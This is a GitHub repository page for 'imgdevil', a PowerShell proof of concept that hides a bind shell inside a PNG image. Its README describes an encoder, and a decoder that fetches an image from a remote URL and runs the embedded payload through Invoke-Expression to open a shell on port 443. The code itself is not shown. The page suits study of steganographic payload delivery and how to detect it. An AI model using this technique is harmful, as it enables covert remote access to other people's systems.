Skip to content
/ imgdevil Public

quick and dirty proof-of-concept to hide shells in images

49 stars 8 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

nyxgeek/imgdevil

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
README.md
README.md
 
 
bindshell_one-liner.ps1
bindshell_one-liner.ps1
 
 
imgdevil.ps1
imgdevil.ps1
 
 
imgdevil_decoder_only.ps1
imgdevil_decoder_only.ps1
 
 
kilroy500.png
kilroy500.png
 
 

Repository files navigation

imgdevil

quick and dirty proof-of-concept to hide shells in images

overview

This code is rough. It is strictly to demonstrate.

There are two files:

  • imgdevil.ps1 -- contains both encoder and decoder. DOES NOT EXECUTE ON ITS OWN
  • imgdevil_decoder_only.p1 -- the decoder + invoke-expression to run. !! THIS WILL CREATE A SHELL !!

encoding

To encode an image, there are a few spots you will need to manually update in the script.

$originalimagepath = "C:\Users\nyxgeek\Desktop\kilroy500.png"

and

$inputpowershellpath = "C:\Users\nyxgeek\Desktop\bindshell_one-liner.ps1"

The rest of the paths are local, and will write out to the local directory.

 

decoding

To decode an image, only one line needs to be changed:

$webpath = "https://pbs.twimg.com/media/DUUb7yQVQAEGZDp.png"

by default, this points to an encoded bind shell on port 443.

 

 

See the original blog post for more information:

About

quick and dirty proof-of-concept to hide shells in images

Resources

Readme
Activity

Stars

49 stars

Watchers

2 watching

Forks

8 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages